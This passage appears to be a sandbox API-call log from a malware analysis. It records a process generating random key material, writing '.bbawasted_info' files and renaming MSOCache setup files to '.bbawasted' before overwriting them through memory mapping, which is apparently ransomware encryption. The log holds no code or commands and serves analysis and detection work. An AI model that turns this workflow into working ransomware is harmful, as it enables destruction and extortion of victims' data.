CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.811] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.811] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.819] SetEndOfFile (hFile=0x110) returned 1 [0067.821] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5540 | out: hHeap=0x580000) returned 1 [0067.821] CloseHandle (hObject=0x110) returned 1 [0067.823] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.823] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0650 | out: hHeap=0x580000) returned 1 [0067.823] _aulldvrm () returned 0x0 [0067.823] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.824] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.824] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.824] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5baab8 [0067.824] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.824] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.825] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.825] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.825] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.825] WriteFile (in: hFile=0x110, lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.826] SetEndOfFile (hFile=0x110) returned 1 [0067.826] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.826] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.826] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.827] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0067.827] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0067.827] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x7c4 [0067.827] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c4) returned 0x570000 [0067.828] CloseHandle (hObject=0x120) returned 1 [0067.830] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.831] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf490 | out: pbBuffer=0x5bf490) returned 1 [0067.831] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.831] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.831] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.831] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.840] SetEndOfFile (hFile=0x110) returned 1 [0067.842] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5540 | out: hHeap=0x580000) returned 1 [0067.842] CloseHandle (hObject=0x110) returned 1 [0067.843] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.843] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf690 | out: hHeap=0x580000) returned 1 [0067.843] _aulldvrm () returned 0x0 [0067.843] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.844] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.844] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.844] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0067.844] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5c5540 [0067.844] lstrcpyW (in: lpString1=0x5c55e2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.844] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf448 [0067.844] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.845] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf448 | out: pbBuffer=0x5bf448) returned 1 [0067.845] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.845] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.846] WriteFile (in: hFile=0x110, lpBuffer=0x5bf448*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf448*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.849] SetEndOfFile (hFile=0x110) returned 1 [0067.849] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.849] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf448 | out: hHeap=0x580000) returned 1 [0067.849] lstrcpyW (in: lpString1=0x5c55e2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.849] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.bbawasted")) returned 1 [0067.852] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.852] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0067.852] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x5ac [0067.852] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0x570000 [0067.852] CloseHandle (hObject=0x118) returned 1 [0067.858] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.858] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5c5840 | out: pbBuffer=0x5c5840) returned 1 [0067.858] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.858] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.859] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.859] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.868] SetEndOfFile (hFile=0x110) returned 1 [0067.870] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf1f0 | out: hHeap=0x580000) returned 1 [0067.870] CloseHandle (hObject=0x110) returned 1 [0067.871] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5540 | out: hHeap=0x580000) returned 1 [0067.871] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0750 | out: hHeap=0x580000) returned 1 [0067.871] _aulldvrm () returned 0x0 [0067.871] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.872] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.872] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.872] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.872] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5bf1f0 [0067.872] lstrcpyW (in: lpString1=0x5bf288, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.872] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf4a0 [0067.872] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.873] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf4a0 | out: pbBuffer=0x5bf4a0) returned 1 [0067.873] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.873] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.873] WriteFile (in: hFile=0x110, lpBuffer=0x5bf4a0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf4a0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.874] SetEndOfFile (hFile=0x110) returned 1 [0067.874] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.874] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf4a0 | out: hHeap=0x580000) returned 1 [0067.874] lstrcpyW (in: lpString1=0x5bf288, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.875] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0067.876] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.876] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x750 [0067.876] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x570000 [0067.876] CloseHandle (hObject=0x11c) returned 1 [0067.878] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.879] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0067.879] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.879] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.880] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.880] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.888] SetEndOfFile (hFile=0x110) returned 1 [0067.890] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0067.890] CloseHandle (hObject=0x110) returned 1 [0067.899] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf1f0 | out: hHeap=0x580000) returned 1 [0067.899] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bad68 | out: hHeap=0x580000) returned 1 [0067.899] _aulldvrm () returned 0x0 [0067.899] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.900] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.900] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.900] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0067.900] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5bf6a8 [0067.900] lstrcpyW (in: lpString1=0x5bf748, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.900] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bdf00 [0067.900] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.900] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bdf00 | out: pbBuffer=0x5bdf00) returned 1 [0067.901] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.901] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.902] WriteFile (in: hFile=0x110, lpBuffer=0x5bdf00*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bdf00*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.902] SetEndOfFile (hFile=0x110) returned 1 [0067.903] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.903] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.903] lstrcpyW (in: lpString1=0x5bf748, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.bbawasted")) returned 1 [0067.906] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.906] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.906] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x391 [0067.906] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x391) returned 0x570000 [0067.906] CloseHandle (hObject=0x114) returned 1 [0067.909] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.909] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf9a8 | out: pbBuffer=0x5bf9a8) returned 1 [0067.909] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.909] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.910] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.910] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.919] SetEndOfFile (hFile=0x110) returned 1 [0067.921] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.921] CloseHandle (hObject=0x110) returned 1 [0067.922] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf6a8 | out: hHeap=0x580000) returned 1 [0067.922] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0850 | out: hHeap=0x580000) returned 1 [0067.922] _aulldvrm () returned 0x0 [0067.922] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.923] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.923] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.923] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.923] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5bf6a8 [0067.923] lstrcpyW (in: lpString1=0x5bf740, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.923] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bdf00 [0067.923] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.924] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bdf00 | out: pbBuffer=0x5bdf00) returned 1 [0067.924] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.924] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.924] WriteFile (in: hFile=0x110, lpBuffer=0x5bdf00*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bdf00*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.925] SetEndOfFile (hFile=0x110) returned 1 [0067.925] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.925] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.925] lstrcpyW (in: lpString1=0x5bf740, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.926] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.926] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0067.926] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x5ac [0067.926] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0x570000 [0067.926] CloseHandle (hObject=0x118) returned 1 [0067.928] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.929] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf9a0 | out: pbBuffer=0x5bf9a0) returned 1 [0067.929] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.929] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.930] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.930] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.938] SetEndOfFile (hFile=0x110) returned 1 [0067.956] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.956] CloseHandle (hObject=0x110) returned 1 [0067.957] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf6a8 | out: hHeap=0x580000) returned 1 [0067.958] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9660 | out: hHeap=0x580000) returned 1 [0067.958] _aulldvrm () returned 0x0 [0067.958] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5bee70) returned 1 [0067.958] CryptGenRandom (in: hProv=0x5bee70, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.958] CryptReleaseContext (hProv=0x5bee70, dwFlags=0x0) returned 1 [0067.958] lstrlenW 